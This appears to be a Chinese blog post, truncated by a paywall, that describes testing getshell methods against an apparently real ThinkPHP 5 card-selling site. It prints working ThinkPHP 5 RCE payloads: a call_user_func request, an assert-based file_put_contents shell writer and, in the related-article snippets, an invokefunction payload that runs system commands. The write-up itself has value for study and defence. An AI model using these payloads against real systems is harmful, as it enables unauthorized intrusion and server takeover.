【网络安全】一次实战中对tp5网站getshell方式的测试

最新推荐文章于 2024-06-04 16:20:34 发布
原创 最新推荐文章于 2024-06-04 16:20:34 发布 · 2k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #网络安全 #计算机网络

本文记录了一次针对TP5网站的渗透测试过程,由于PHP版本限制,作者探索了多种在PHP 7.1.33下绕过disable_function获取shell的方法,包括尝试RCE、读取数据库信息、日志包含、session包含以及利用未禁用的exec函数从VPS下载shell。通过这些方法,作者成功地在不同阶段getshell,并强调实战是学习网络安全的重要途径。

前言

之前接触tp5的站比较少,只知道利用RCE漏洞getshell的方式。在最近对一个发卡平台渗透的过程中,由于php版本限制,无法直接使用RCE的payload拿shell,于是结合该网站尽可能多的测试一下tp5+php7.1环境下的getshell方法。

查看资料

正文

拿到站点后,访问首页如下
在这里插入图片描述

不过看不出来具体版本,不确定是否存在RCE,于是用exp打一下试试

_method=__construct&method=get&filter=call_user_func&get[]=phpinfo

在这里插入图片描述
发现执行成功了,disable_function禁用了挺多函数
在这里插入图片描述
一般php版本低于7.1的情况下,接下来直接用exp写shell就可以了

方法一

直接用下面的exp写shell

s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert

但是这个exp中使用了assert,而上面看到php版本是7.1.33,这个版本是已经没办法使用assert了,所以这里这个方法是不能用的

方法二

上面的exp没办法写shell,但是phpinfo是执行了的,那么RCE是存在的。于是想到可以通过读取文件读取数据库的账号密码

最低0.47元/天 解锁文章
一次实战中对tp5网站getshell方式测试
渗透测试研究中心
01-12 1099
0x00 前言之前接触tp5比较少,只知道利用RCE漏洞getshell方式。在最近对一个发卡平台渗透的过程中,由于php版本限制,无法直接使用RCE的payload拿shell,于是结合该网站尽可能多的测试一下tp5+php7.1环境下的getshell方法。0x02 正文拿到点后,访问首页如下测试中,发现是thinkphp的,报错如下不过看不出来具体版本,不确定是否存在RCE,于是...
ThinkPHP6.0任意文件创建Getshell
m0_48520508的博客
08-19 1375
0x01简介 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本
一次tp5.0.24 getshell1
08-03
一次tp5.0.24 getshell1
phpinfo 命令执行函数被禁用绕过tips
yggcwhat
06-02 2031
phpinfo 命令执行函数被禁用绕过tips
THINKPHP5 getshell
公众号shadow sock7
12-11 8141
参考: https://mp.weixin.qq.com/s/oWzDIIjJS2cwjb4rzOM4DQ https://www.anquanke.com/post/id/167653 http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23及v5.1.31以下版本)_远程命令执行漏洞利用(getshell)/ ...
TP5getshell攻击
Charles D
12-31 699
TP5getshell攻击攻击案例解决方案 攻击案例 http://你的域名/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id 以上的连接可以攻击TP5的部分网站,出现phpinfo(),所以很多的文件位置就会暴露出来...
TP5代码执行漏洞分析:绕过WAF与getshell方法
"一次有趣的tp5代码执行1" 在网络安全领域,发现并利用漏洞是常态。这次分享的是关于ThinkPHP框架5.0.23版本的一个代码执行漏洞。ThinkPHP是一个广泛使用的PHP开发框架,而这个特定的漏洞,称为“tp5method代码...
TP900S安全实战攻略】:保障设备与数据安全5大策略
[【TP900S安全实战攻略】:保障设备与数据安全5大策略](https://kecamtechnologies.com/wp-content/uploads/2021/04/Data-Auditing-Monitoring-1024x536.jpg) 参考资源链接:[振中 ThinPad900S 数据采集终端:...
【渗透测试】DC-1靶机实战(上)漏洞扫描获取反弹shell
最新发布
m0_74313947的博客
06-04 1691
靶机下载地址靶机界面渗透测试流程:1.范围界定2. 信息搜集3. 目标识别4. 服务枚举5. 漏洞映射6. 社会工程学7. 漏洞利用8. 权限提升9. 访问维护0. 文档报告。
ThinkPHP5 源码剖析(批量getShell原理)
weixin_43725997的博客
08-08 1489
前言: === 废话!!可跳过 === 近日,导师给了个不大不小的任务 导师之前面试我的时候,看我的简历上(chui)写(niu)着(pi)阅读过TP3源码并自己根据思想写了个PHP框架。 刚好公司有个之前外包出去的项目是用的TP框架,然后最近(好几个月了吧??这么晚才来补洞的嘛(⊙_⊙)?)TP5不是爆出了批量getshell的漏洞吗? 运维小哥那边反映老有人来攻击,让导师去和外包沟通,升级一下...
ThinkPHP 5.x 远程命令执行漏洞复现(GetShell
热门推荐
北风
12-12 1万+
注:转载请注明出自:https://blog.youkuaiyun.com/qq_36711453/article/details/84977739 一、简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1...
tp5.0.x 5.1.x 最新getshell漏洞
tiancityycf的专栏
05-27 1380
参考:https://www.phpmianshi.com/?id=102 概况 2018年12月09日thinkphp团队发布了版本更新:https://blog.thinkphp.cn/869075 ,其中修复了一处getshell漏洞。 影响范围 5.1.x < 5.1.315.0.x<= 5.0.23 实战演练 比如5.0.7漏洞利用方法: https://www.phpmianshi.com/?s=index/\think\app/invokefunct...
如何利用ThinkPHPv5的漏洞来getshell
星空下de青铜
03-26 4175
影响范围 ThinkPHP 5.0系列 < 5.0.24 过程 查看信息 http://ip(url)/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=id(1,2,3之类的) http://ip(url)/index.php?s=index/think\app/invokefuncti...
实战绕过宝塔PHP disable_function 限制getshell
zhangge3663的博客
03-09 4305
一、这次做的目标点是一个某XX点,通过前期的信息收集,可以发现该点是由宝塔(一般根服务器开放端口888、8888和报错界面判定)+ShuipfCMS框架搭建的 端口信息 后台 二、默认的ShuipfCMS系统后台访问http://www.xxx.com/admin/会自动跳转到后台,但是这个点感觉是被二次开发过的,点后台和前端页面不在同一个子域名下,该后台还是通过收集子域名得到的,访问某xxx.xxx.com会自动跳转到后台登录页面。 三、这里想着尝试绕过验证码来对后台用户名密码进
ThinkPHP5.0版本 远程命令执行漏洞GetShell
09-02 359
https://blog.youkuaiyun.com/Fly_hps/article/details/84954664 漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的点数量之多,该漏洞还是存在一定的影响范围。由于框架对控...
php _get漏洞,thinkphp代码执行getshell的漏洞解决
weixin_35797900的博客
03-18 692
先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell影响的范围:5.x < 5.1.31, <= 5.0.23漏洞危害: 导致系统被提权(你懂的)先来讲下,5.0 跟5.1的区别吧,tp5.1中引入了容器(Container)和门面(Facade)这两个新的类 tp5.0是没有这两个新的类的,漏洞原理URL:ht...
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 1万+
ThinkPHP5系列远程代码执行漏洞复现(详细)
对某擦边点的一次渗透
crowsec
12-19 1万+
对某擦边点的一次渗透
极客大挑战2021-部分wp
qq_53460654的博客
12-15 1759
DARK 看到后缀去搜然后洋葱浏览器下载打开即可. SYC{hav3_fUn_1n_darK} welcome2021 f12看到提示后,改为welcom的请求方式,直接curl -X 改请求方式。 访问fllllaaaggg9.php发现这是个跳转页面,抓包发送一次得到flag SYC{WeLcom3_t0_Geek_2o21!!} babysql 简单试了试1’union select 1,2,3,4#,发现有两个回显点 先爆数据库 1'union select group_concat(schem
TP5+X-Admin搭建网站后台管理系统实战教程
1. **项目目录结构**:TP5App可能指的是一个使用ThinkPHP5.0框架搭建的项目应用,这个应用通常包含以下目录结构: - application:应用目录,存放具体的业务逻辑层(Model)、控制层(Controller)、视图层(View)...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值